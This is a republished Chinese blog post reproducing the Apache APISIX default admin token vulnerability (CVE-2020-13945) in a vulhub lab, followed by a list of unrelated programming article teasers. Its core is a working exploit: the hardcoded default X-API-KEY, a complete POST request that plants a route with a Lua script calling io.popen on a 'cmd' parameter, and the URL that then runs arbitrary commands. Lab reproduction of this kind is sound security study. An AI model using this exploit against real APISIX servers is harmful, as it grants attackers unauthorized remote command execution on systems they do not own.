vulhub中Apache APISIX 默认密钥漏洞复现（CVE-2020-13945）

vulhub中Apache APISIX 默认密钥漏洞复现（CVE-2020-13945）

news/2025/4/19 16:32:20/文章来源:https://blog.csdn.net/yougexiaojiuguan/article/details/136029665

Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下，Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`，攻击者利用这个Token可以访问到管理员接口，进而通过`script`参数来插入任意LUA脚本并执行。

1.利用默认Token增加一个恶意的router，其中包含恶意LUA脚本：

POST /apisix/admin/routes HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406{"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M","upstream": {"type": "roundrobin","nodes": {"example.com:80": 1}}
}

2.然后，我们访问刚才添加的router，就可以通过cmd参数执行任意命令：

http://your-ip:9080/attack?cmd=id

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/667937.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

鸿蒙（HarmonyOS）项目方舟框架（ArkUI）之Menu组件

鸿蒙（HarmonyOS）项目方舟框架（ArkUI）之Menu组件

鸿蒙（HarmonyOS）项目方舟框架（ArkUI）之Menu组件一、操作环境操作系统: Windows 10 专业版、IDE:DevEco Studio 3.1、SDK:HarmonyOS 3.1 二、Menu组件 TextClock组件通过文本将当前系统时间显示在设备上。支持不同时区的时间…

阅读更多...

Day42 474一和零完全背包理论基础 518零钱兑换II

Day42 474一和零完全背包理论基础 518零钱兑换II

474 一和零给你一个二进制字符串数组 strs 和两个整数 m 和 n 。请你找出并返回 strs 的最大子集的大小，该子集中最多有 m 个 0 和 n 个 1 。如果 x 的所有元素也是 y 的元素，集合 x 是集合 y 的子集。示例 1： 输入：s…

阅读更多...

leetcode142 环形链表 II

leetcode142 环形链表 II

文章目录 1. 解法：快慢指针2. 原题 [142. 环形链表 II](https://leetcode.cn/problems/linked-list-cycle-ii/) 1. 解法：快慢指针定义两个指针fast和slow，同时从链表头出发，fast每次走两步，slow每次走1步&#xff0c…

阅读更多...

第一个Linux 的.c 程序？

第一个Linux 的.c 程序？

用vim 编辑器来写c 1. 打开终端首先，打开终端。你可以通过按下Ctrl Alt T 组合键或从应用程序菜单中选择终端。 2. 使用vim创建C程序在终端中，运行以下命令以使用vim创建一个C程序文件。假设我们将文件命名为hello.c： vim hello.c …

阅读更多...

深度学习本科课程实验4 卷积神经网络

深度学习本科课程实验4 卷积神经网络

二维卷积实验 1.1 任务内容手写二维卷积的实现，并在至少一个数据集上进行实验，从训练时间、预测精度、Loss变化等角度分析实验结果（最好使用图表展示）（只用循环几轮即可）使用torch.nn实现二维卷积&…

阅读更多...

ShardingSphere 5.x 系列【5】Spring Boot 3.1 集成Sharding Sphere-JDBC并实现读写分离

ShardingSphere 5.x 系列【5】Spring Boot 3.1 集成Sharding Sphere-JDBC并实现读写分离

有道无术，术尚可求，有术无道，止于术。本系列Spring Boot 版本 3.1.0 本系列ShardingSphere 版本 5.4.0 源码地址：https://gitee.com/pearl-organization/study-sharding-sphere-demo 文章目录 1. 概述2. 使用限制3. 案例演示3.…

阅读更多...

[Angular 基础] - 数据绑定(databinding)

[Angular 基础] - 数据绑定(databinding)

[Angular 基础] - 数据绑定(databinding) 上篇笔记，关于 Angular 的渲染过程及组件的创建&简单学习：[Angular 基础] - Angular 渲染过程 & 组件的创建 Angular 之中的 databinding 是一个相对而言更加复杂，以及我个人觉得相对而言比…

阅读更多...

算法笔记刷题日记——3.简单入门模拟 3.1简单模拟

算法笔记刷题日记——3.简单入门模拟 3.1简单模拟

刷题日记 3.1 简单模拟此类题型根据题目描述进行代码的编写，考察代码能力，刷题记录如下： B1001 B1032 B1016 B1026 B1046 B1008 B1012 B1018 A1042 A1046 A1065 B1010 A1002 A1009 错题记录 B1008 数组元素循环右移问题一个数组_A_中存有…

阅读更多...

[机缘参悟-145] ：一个软件架构师对佛学的理解 -9- 修行的目标和层次：净心、智慧和解脱

[机缘参悟-145] ：一个软件架构师对佛学的理解 -9- 修行的目标和层次：净心、智慧和解脱

目录前言： 第一层次（小乘）：净心，摆脱痛苦和烦扰，进入平静和安宁 1.1 什么是净心 1.2 如何达到净心的状态 1.3 "常乐我净" 第二层次（中乘）：智慧&#xf…

阅读更多...

【Spring连载】使用Spring Data访问Redis（十三）----支持类Support Classes

【Spring连载】使用Spring Data访问Redis（十三）----支持类Support Classes

【Spring连载】使用Spring Data访问Redis（十三）----支持类Support Classes org.springframework.data.redis.support包提供了各种可重复使用的组件，这些组件依赖Redis作为后端存储。目前，该包包含Redis之上的各种基于JDK的接口实现…

阅读更多...

SpringMVC精简知识点

SpringMVC精简知识点

SpringMVC 数据格式化基本数据类型和字符串自动转换特殊数据类型和字符串自动转换验证及国际化应用实例注意事项和使用细节注解的结合使用数据类型转换校验核心类-DatBinder取消某个属性的绑定中文乱码解决处理json和HttpMessageConverter<T>作业布置SpringMVC文件上传自…

阅读更多...

day19 初始HTML

day19 初始HTML

什么是HTML HTML（Hyper Text Markup Language）超文本标记语言超文本包括：文字、图片、音频、视频、动画等 HTML5，提供了一些新的元素和一些有趣的新特性，同时也建立了一些新的规则。这些元素、特性和规则的建立&…

阅读更多...

【Linux】进程间通信 --管道通信

【Linux】进程间通信 --管道通信

Halo，这里是Ppeua。平时主要更新C语言，C，数据结构算法…感兴趣就关注我吧！你定不会失望。本篇导航 0. 进程间通信原理1. 匿名管道1.1 通信原理1.2 接口介绍 2. 命名管道2.1 接口介绍 3. 共享内存3.1 通信原理3.2 接口介绍 0. 进…

阅读更多...

用户访问一个购物网站时TCP/IP五层参考模型中每一层的功能

用户访问一个购物网站时TCP/IP五层参考模型中每一层的功能

当用户访问一个购物网站时，网络上的每一层都会涉及不同的协议，具体网络模型如下图所示。以下是每个网络层及其相关的协议示例： 物理层：负责将比特流传输到物理媒介上，例如电缆或无线信号。所以在物理层，可…

阅读更多...

Dell服务器iDRAC9忘记密码, 通过RACADM工具不重启重置密码

Dell服务器iDRAC9忘记密码, 通过RACADM工具不重启重置密码

系列文章目录文章目录系列文章目录前言一、RACADM工具二、linux环境1.解压安装RACADM工具测试RACADM工具重置iDRAC密码 Windows环境前言一、RACADM工具 RACADM工具官网参考信息 https://www.dell.com/support/kbdoc/zh-cn/000126703/%E5%A6%82%E4%BD%95-%E9%87%8D%E7%BD…

阅读更多...

异步八种方式提高性能

异步八种方式提高性能

异步的八种实现方式线程ThreadFuture异步框架CompletableFutureSpring注解AsyncSpring ApplicationEvent事件消息队列第三方异步框架，比如Hutool的ThreadUtilGuava异步一、线程异步 public class AsyncThread extends Thread{Overridepublic void run(){System…

阅读更多...

东方博宜1126：英文翻译

东方博宜1126：英文翻译

题目描述请将一个数字，翻译成对应的英文。输入一个自然数 n。（0≤n≤2^31−1） 输出输出这个数的英文，最后不要有多余的空格。输入样例： 1111111111 输出样例： one billion one hundred and e…

阅读更多...

计算机网络-封装成帧透明传输（组帧方法）

计算机网络-封装成帧透明传输（组帧方法）

文章目录数据链路层功能概述封装成帧透明传输组帧方法字符计数法字符填充法零比特填充法违规编码法字符填充法为啥复杂和不兼容数据链路层功能概述类似老板让小秘书送文件给别的公司，小秘书告诉傻子怎么把该文件送到别的公司的小秘书，然后别的公司的…

阅读更多...

c# File.WriteAllLines 和 File.WriteAllText

c# File.WriteAllLines 和 File.WriteAllText

File.WriteAllLines 和 File.WriteAllText 都是 C# 中用于写入文本文件的方法，但它们有一些区别。 1. File.WriteAllLines 方法： File.WriteAllLines 方法用于将字符串数组的内容按行写入文本文件。每个数组元素都被写入文件的一行，且方法会…

阅读更多...

探索边缘计算的未来：MobileNetV3Small及其在高效图像处理中的创新应用

探索边缘计算的未来：MobileNetV3Small及其在高效图像处理中的创新应用

引言在不断发展的计算机视觉和深度学习领域中，对于更高效、更强大的神经网络的追求从未停止。在这个领域的领跑者之一是MobileNetV3Small架构，这是MobileNetV3家族的一个变体，以其在处理图像任务方面的高效率和有效性而闻名。本文深入探讨了…

阅读更多...

最新文章